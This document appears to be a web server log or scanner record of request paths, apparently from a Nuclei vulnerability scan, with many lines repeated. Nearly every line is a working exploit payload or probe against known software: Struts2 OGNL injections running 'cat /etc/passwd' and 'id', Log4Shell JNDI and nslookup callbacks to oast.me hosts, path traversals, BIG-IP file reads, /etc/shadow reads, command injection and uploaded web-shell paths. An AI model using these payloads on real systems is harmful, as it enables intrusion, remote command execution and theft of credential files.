/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/web/?id=nuclei%25{128*128}
/web/boaform/admin/formTracert
/web/cfide-scripts/ajax/package/cfajax.js
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/wp-json/buddypress/v1/signup
/web/api/user/reg
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/cgi-bin/mainfunction.cgi
/web/login.htm
/web/mailingupgrade.php
/web/api/group/list
/web
/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/cgi-bin/system_mgr.cgi?
/web/
/web/api/jsonws/invoke
/web/cgi-bin/status
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/cgi/networkDiag.cgi
/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
/web/api/jsonws/invoke
/web/console/login/LoginForm.jsp
/web/solr/admin/cores?wt=json
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/apisix/admin/routes
/web/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/api/login
/web/druid/indexer/v1/sampler
/web/cgi-bin/stats
/web/
/web/ws_utc/resources/setting/options
/web/login
/web/login.php
/web/uploads/elfinder/elfinder-cke.html
/web/version.web
/web/EemAdminService/EemAdmin
/web/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D
/web/ws_utc/resources/setting/keystore
/web/pages/createpage.action?spaceKey=myproj
/web/plugin/add
/web/apply_sec.cgi
/web/pages/templates2/viewpagetemplate.action
/web/tools.cgi
/web/apply_sec.cgi
/web/plugin/customMethod
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/cfide-scripts/ajax/package/cfajax.js
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/jars/upload
/web/wp-json/buddypress/v1/signup
/web/var
/web/ws/v1/cluster/apps/new-application
/web/
/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/tools.cgi
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/web/mailingupgrade.php
/web/cgi-bin/;cat$IFS/etc/passwd
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/cfmx/CFIDE/scripts/ajax/package/cfajax.js
/web/wp-admin/admin-ajax.php
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25SnEgaRzmhDNUNeO7b692mCj6W.jsp
/web/mifs/.;/services/LogService
/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/web/api/jsonws/invoke
/web/apisix/admin/routes
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/25SnEcWqu2D9ZvV5C4BzTD0Nful?cmd=id
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
/web/cgi-bin/login.cgi
/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/install/install.php?step=4
/web/api/login
/web/cgi-bin/stats
/web/?s=index/index/index
/web/install/includes/configure.php
/web/webadmin/script?command=|%20nslookup%20c8ach799m8v918fkv9igcekctkoyyyyg4.oast.me
/web/version.web
/web/EemAdminService/EemAdmin
/web/cgi-bin/test
/web/goform/setSysAdm
/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D
/web/login.php
/web/users/sign_in
/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/web/storfs-asup
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/Upload/upload_file.php?l=test
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/index.php
/web/servlet/~ic/bsh.servlet.BshServlet
/web/servlet/~ic/bsh.servlet.BshServlet
/web/pages/templates2/viewpagetemplate.action
/web/jars/upload
/web/apply_sec.cgi
/web/apply_sec.cgi
/web/pages/createpage-entervariables.action
/web/tools.cgi
/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/wp-admin/admin-ajax.php
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25SnEgaRzmhDNUNeO7b692mCj6W.jsp
/web/wp-content/uploads/workreap-temp/25SnEaad1vBVjS7bRv3FVGuwlY1.php
/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/web/25SnEcWqu2D9ZvV5C4BzTD0Nful?cmd=id
/web/cgi-bin/login.cgi
/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/cgi-bin/test
/web/goform/setSysAdm
/web/cgi-bin/status/status.cgi
/web/users/sign_in
/web/Upload/upload_file.php?l=test
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/Upload/test/test.php
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/servlet/~ic/bsh.servlet.BshServlet
/web/pages/createpage-entervariables.action
/web/template/custom/content-editor
/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/wp-content/uploads/workreap-temp/25SnEaad1vBVjS7bRv3FVGuwlY1.php
/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/web/hsqldb%0a
/web/cgi-bin/status/status.cgi
/web/Upload/test/test.php
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/test.cgi
/web/template/custom/content-editor
/web/templates/editor-preload-container
/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/hsqldb%0a
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/test.cgi
/web/tmui/locallb/workspace/fileSave.jsp
/web/debug.cgi
/web/templates/editor-preload-container
/web/cgi-bin/test-cgi
/web/users/user-dark-features
/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/web/tmui/locallb/workspace/fileSave.jsp
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/cgi-bin/test-cgi
/web/users/user-dark-features
/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/tmui/locallb/workspace/tmshCmd.jsp
